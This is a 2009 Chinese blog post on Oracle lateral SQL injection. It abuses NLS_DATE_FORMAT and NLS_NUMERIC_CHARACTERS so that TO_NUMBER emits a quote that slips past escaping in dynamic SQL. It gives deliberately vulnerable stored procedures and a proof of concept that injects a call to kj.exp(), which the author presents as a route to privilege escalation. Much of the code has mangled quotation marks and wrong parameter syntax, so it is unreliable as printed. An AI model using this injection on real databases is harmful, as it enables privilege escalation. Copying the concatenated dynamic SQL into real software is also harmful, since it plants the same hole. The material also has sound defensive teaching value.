ORACLE LATERAL-SQL-INJECTION 个人见解
来源:asp之家 时间:2009-03-04 10:34:00
如果直接执行SQL语句或者参数绑定则不用担心太多,
如以下ORACLE存储过程
create or replace procedure kjdatepoc(date d)
as
begin
insert into kjdatetable values(d);
commit;
end;
根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。
例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE
看以下存储过程
create or replace procedure kjdatepoc(date d)
as
begin
execute immediate ‘insert into kjdatetable values('|| d ||')';
commit;
end;
那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的, 老外的PAPER讲解得非常详细了 ,我在这里也不废话。
惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号!
看以下语句
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;
输出一下结果
1000′10001
只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程
create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)
is
SecStr varchar2(1000);
begin
SecStr:=replace(kjexpstr,””,”””);
sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name=”'||SecStr||””);
end;
内部对varchar类型进行替换了!我们可以进行测试
begin
numinjpoc(1000,”'–');
end;
其输出SQL语句为
SELECT * FROM DUAL WHERE ID=1000 and name=”'–'
单引号被转义掉了
那么如果我们结合这个NUMBER类型怎么进行注射呢?
ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';
begin
numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');
end;
看看输出结果
SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()–'
这样就可以间接的攻击它…
在某中程度才来需要ALTER SESSION 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。
标签:ORACLE,LATERAL,SQL-INJECTION,经验
0
投稿
猜你喜欢
如何修改Editplus让图片自适应界面大小
2007-09-26 12:37:00
打造“前端开发”程序员专用版EditPlus
2009-01-05 13:04:00
教你四种方法用来查看mysql版本
2009-06-28 11:13:00
Oracle 数据库操作技巧集
2010-07-26 12:49:00
查看ASP详细错误提示信息的图文设置方法
2011-02-05 11:02:00
10分钟学会Google Map API (一)
2009-06-07 18:17:00
9个Web设计中常见的可用性错误[译]
2009-03-11 20:25:00
Check In和Check Out的多人协作管理
2007-02-03 11:39:00
用asp给网站添加rss聚合功能
2007-11-05 19:08:00
使用SQL Server时最容易忽略的21个问题
2009-01-13 13:59:00
谦逊编程(翻译整理)
2009-07-28 12:52:00
使用BULK INSERT大批量导入数据 SQLSERVER
2012-01-05 19:26:36
XAMPP和Mysql共存的方法
2010-12-03 16:34:00
ASP与MySQL的连接[图文教程]
2010-03-14 11:21:00
用我喜欢的字体(Cufon)
2009-12-11 18:51:00
使用单通道实现半透明效果
2009-12-12 17:40:00
彻底弄懂CSS盒子模式之一(DIV布局快速入门)
2007-05-11 17:03:00
最新屏蔽百度快照的方法
2009-07-06 14:37:00
一段有趣的js代码的研究
2008-04-29 21:47:00
Oracle数据库索引的维护
2010-07-26 13:29:00